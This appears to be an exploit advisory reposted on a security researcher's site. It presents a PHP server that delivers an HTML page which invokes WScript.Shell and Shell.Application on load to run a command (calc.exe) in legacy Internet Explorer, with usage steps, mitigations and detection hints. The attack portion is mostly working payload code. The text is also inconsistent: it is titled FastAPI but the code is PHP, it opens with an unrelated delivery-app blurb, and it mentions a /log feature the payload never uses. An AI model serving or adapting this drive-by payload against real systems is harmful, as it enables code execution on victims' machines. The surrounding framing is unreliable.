FastAPI?Based Delivery Server Proof of Concept
FastAPI?Based Delivery Server Proof of Concept
A FastAPI-based delivery server Proof of Concept (PoC) outlines a A FastAPI-based delivery server Proof of Concept (PoC) outlines a backend system for managing food or package deliveries. It provides robust API endpoints for customers to place orders, vendors to manage them, and drivers to update delivery status.

Key functionalities include order creation, tracking, driver assignment, and real-time status updates. The PoC leverages FastAPI's asynchronous capabilities for efficient I/O and its Pydantic integration for automatic data validation and serialization.

FastAPI was chosen for its high performance, rapid development, and automatic interactive API documentation (Swagger UI/ReDoc), which accelerates front-end integration. It also simplifies implementing authentication and authorization.

This PoC aims to validate the technical feasibility, responsiveness, and rapid development potential of using FastAPI for a scalable, real-time delivery platform backend, proving its suitability for production-grade applications.

=============================================================================================================================================
| # Title : Analyzing Legacy ActiveX Execution Behavior via a FastAPI?Based Delivery Server |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built?in component. No standalone download available. |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212823/ & CVE-2025-54100

[+] Summary : This script is a FastAPI + Uvicorn Proof?of?Concept server created for educational and historical analysis related to CVE?2025?54100.

Important limitations:

[!] Does NOT work on modern browsers

[!] Does NOT execute real commands today

[!] Not a real exploit

[!] Safe for educational demonstration only

[+] Technical context:

The JavaScript payload uses legacy ActiveX calls such as:

new ActiveXObject("WScript.Shell").Run("calc.exe");

These techniques only worked in the past under very specific conditions:

Internet Explorer

ActiveX explicitly enabled

Extremely low security settings

All modern browsers and operating systems fully block this behavior.

[+] What the PoC demonstrates:

How ActiveX-based execution was historically dangerous

Why Microsoft and browser vendors permanently disabled ActiveX

How browser security policies evolved over time

Why legacy exploit techniques are no longer viable

Why it may appear dangerous to some:

The code looks ?powerful?

The presence of a CVE identifier suggests severity

In reality, it relies entirely on deprecated and extinct technologies

[+] Purpose:

Academic reference

Security history education

Legacy vulnerability analysis

Not intended for exploitation or real?world attacks

[+] Vendor :

Microsoft (Internet Explorer ? Legacy Components)

[+] Affected Products :

Internet Explorer (legacy versions with ActiveX enabled)

Windows systems where ActiveX and scripting are explicitly allowed

[+] Affected Components :

WScript.Shell

Shell.Application

ActiveX scripting interfaces exposed to the browser context

[+] Severity :

Medium (Historical / Legacy Risk)

This issue is considered historical and non?exploitable on modern browsers. It is relevant for research environments, legacy systems, and defensive analysis only.

[+] POC

This Proof of Concept (PoC) demonstrates how legacy ActiveX objects in Internet Explorer can be invoked automatically when a crafted HTML payload is delivered by a minimal HTTP server.
The PoC shows automatic execution attempts using WScript.Shell and Shell.Application without additional user interaction beyond page rendering.

Modern browsers have fully mitigated this behavior by disabling ActiveX. The PoC is intended strictly for educational, defensive, and historical security research.

[+] Technical Details :

When Internet Explorer is configured to:

Allow ActiveX execution

Trust the hosting zone

Permit scripting of unsafe controls

a web page can attempt to instantiate legacy COM objects such as:

new ActiveXObject("WScript.Shell")
new ActiveXObject("Shell.Application")

The PoC delivers an HTML payload that attempts command execution (e.g., launching calc.exe) immediately upon page load.

The server also exposes a /log endpoint to demonstrate client?side execution reporting.

[+] PoC Behavior

Lightweight HTTP server

Serves crafted HTML payload

Attempts ActiveX execution on page load

Logs client activity to console

Supported Environment (PoC)

[+] Windows

Internet Explorer (legacy)

ActiveX enabled

Trusted security zone

[+] PHP PoC Code : php poc.php

<?php
/**
* ActiveX Legacy Auto-Execution PoC
* by indoushka
* PHP 5.6+
*/

set_time_limit(0);
error_reporting(E_ALL);

$HOST = "0.0.0.0";
$PORT = 8888;
$BUF = 4096;

function payload_html() {
return <<<HTML
<!DOCTYPE html>
<html>
<head>
<title>ActiveX Legacy PoC</title>
<meta http-equiv="X-UA-Compatible" content="IE=10">
</head>
<body>
<h2>PoC Ready</h2>
<script>
try {
new ActiveXObject("WScript.Shell").Run("calc.exe");
} catch(e) {}

try {
new ActiveXObject("Shell.Application")
.ShellExecute("calc.exe","","","open",1);
} catch(e) {}
</script>
</body>
</html>
HTML;
}

$server = stream_socket_server("tcp://$HOST:$PORT", $e, $s);
echo "[+] Listening on $HOST:$PORT\n";

while ($c = stream_socket_accept($server)) {
$req = fread($c, $BUF);

if (preg_match('#GET /log\?msg=([^ ]+)#', $req, $m)) {
echo "[CLIENT_LOG] ".urldecode($m[1])."\n";
fwrite($c,"HTTP/1.1 200 OK\r\n\r\nOK");
fclose($c);
continue;
}

if (strpos($req,"GET / ") === 0) {
$html = payload_html();
fwrite($c,
"HTTP/1.1 200 OK\r\n".
"Content-Type: text/html\r\n".
"Content-Length: ".strlen($html)."\r\n\r\n".
$html
);
} else {
fwrite($c,"HTTP/1.1 404 Not Found\r\n\r\n");
}
fclose($c);
}


Expected output:

[+] Listening on 0.0.0.0:8888

3. Access the PoC

Open Internet Explorer (legacy) and navigate to:

http://SERVER_IP:8888/


?? ActiveX must be enabled
?? Page must be in a trusted zone

[+] Impact :

Demonstrates automatic invocation of legacy COM objects

Highlights historical browser trust?boundary issues

No impact on modern browsers

[+] Useful for:

Security training

Blue?team detection logic

Legacy system audits

[+] Mitigation :

Disable Internet Explorer

Disable ActiveX entirely

Use modern browsers (Edge, Chrome, Firefox)

Enforce Group Policy restrictions on scripting and COM access

[+] Detection :

Defensive teams can monitor for:

Instantiation of WScript.Shell from browser contexts

Legacy IE process spawning child processes

Unexpected COM object usage from iexplore.exe

[+] Disclaimer :

This Proof of Concept is provided for educational and research purposes only.
The author does not encourage misuse.
All testing should be conducted in isolated laboratory environments.

[+] References :

Microsoft ActiveX Security Documentation

Legacy Internet Explorer Security Model

COM Object Abuse Research

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.